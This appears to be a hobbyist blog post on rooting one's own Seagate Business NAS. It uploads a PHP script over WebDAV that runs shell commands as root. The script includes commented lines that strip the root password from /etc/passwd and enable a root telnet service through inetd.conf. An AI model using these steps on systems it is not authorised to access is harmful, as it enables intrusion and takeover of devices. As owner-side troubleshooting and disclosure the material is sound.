Before we begin:

The information in this post is presented as-is for educational purposes only and comes WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED. If you break your NAS you get to keep all the pieces! I accept no responsibility whatsoever for what you do with this information.

So I had a little run-in with my Seagate 4-bay Business NAS. Fed up with the lack of error messages or logging I decided to look into getting shell access on the device so that I could properly diagnose the problem. The problem was, that most information out there is outdated. It is an old device after all. The best lead I could find was this article as preserved by the internet archive. But would the approach still hold with the latest firmware?

Apparently security isn’t high on the list for this product range, because with the latest firmware version 2015.00330 I could still use this rather simple vector of attack.

In summary:

1. (optional) Get the NAS in a state where you can modify settings through the web-based admin interface. In my case I had to boot the NAS and quickly disable the media server.
2. Set up a share with anonymous WebDAV access. (A named user should work, but I prefer to eliminate any complexities when debugging a system)
3. Save a php script in the root of this share, let’s say shell.php for this example. See below for my interpretation of the initial approach.
4. Run the script by accessing http://YOUR_NAS_IP/shares/YOUR_WEBDAV_SHARE/shell.php. Even with firmware 2015.00330 the script will execute and run as root, which is rather sloppy to say the least.
5. Use this mechanism to modify both /etc/passwd (to create a passwordless root user so that you can execute a ‘su -’ when you login over telnet) and /etc/inetd.conf (to enable the telnet service).
6. Finally run /usr/sbin/inetd to activate the telnet service.

Once you have telnet running, you can log on with the credentials for a regular user. A ‘su -‘ with the admin credentials will get you a root shell.

As opposed to the original article I decided to forgo passing HTTP GET parameters to the NAS’ shell and instead build up a php script with individual shell_exec commands. This way I would get a repeatable result.

The final result is posted below. As-is it will only output a few basic facts about your running system. If you decide to use it on your own NAS you need to modify this script for yourself by uncommenting the lines that use sed to alter /etc/passwd and /etc/inetd.conf. Furthermore you need to uncomment the line that starts inetd. After that only run the scipt once. Delete it from the share afterwards to be on the safe side…

<html>
    <head>
        <meta charset="utf-8">
    </head>
    <body>
    <h1>Notice</h1>
<p> THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
</p>
<pre>

<?php

echo "------------------WHOAMI------------------------\n";
echo shell_exec('whoami');

echo "------------------df -h------------------------\n";
echo shell_exec('df -h');

echo "------------------ls /------------------------\n";
echo shell_exec('ls /');

echo "------------------ls /etc------------------------\n";
echo shell_exec('ls /etc');

echo "------------------ls /etc/init.d------------------------\n";
echo shell_exec('ls /etc/init.d');

echo "------------------du /var------------------------\n";
echo shell_exec('du -h /var');

echo "------------------cat /etc/passwd------------------------\n";
echo shell_exec('cat /etc/passwd');

echo "------------------cat /etc/inetd.conf------------------------\n";
echo shell_exec('cat /etc/inetd.conf');

# THE BUSINESS END...
# If you are confident that /etc/passwd and /etc/inetd.conf are compatible with these sed commands, you can uncomment them.
# WARNING Enabling these lines is at your own risk. If you enable these lines, only run the script once (or you'll append telnet multiple times to /etc/inetd.conf).

echo "------------------sed -i s/root:x:0:0:root:/root::0:0:root:/g /etc/passwd------------------------\n";
#echo shell_exec('sed -i s/root:x:0:0:root:/root::0:0:root:/g /etc/passwd');

echo "------------------cat /etc/passwd------------------------\n";
echo shell_exec('cat /etc/passwd');


echo "------------------sed -i '$ a telnet		stream	tcp	nowait	root	/usr/sbin/telnetd	/usr/sbin/telnetd' /etc/inetd.conf------------------------\n";
#echo shell_exec("sed -i '$ a telnet		stream	tcp	nowait	root	/usr/sbin/telnetd	/usr/sbin/telnetd' /etc/inetd.conf");

echo "------------------cat /etc/inetd.conf------------------------\n";
echo shell_exec('cat /etc/inetd.conf');

echo "------------------/usr/sbin/inetd------------------------\n";
#echo shell_exec('/usr/sbin/inetd');

?>

</pre>
</body></html>

More tk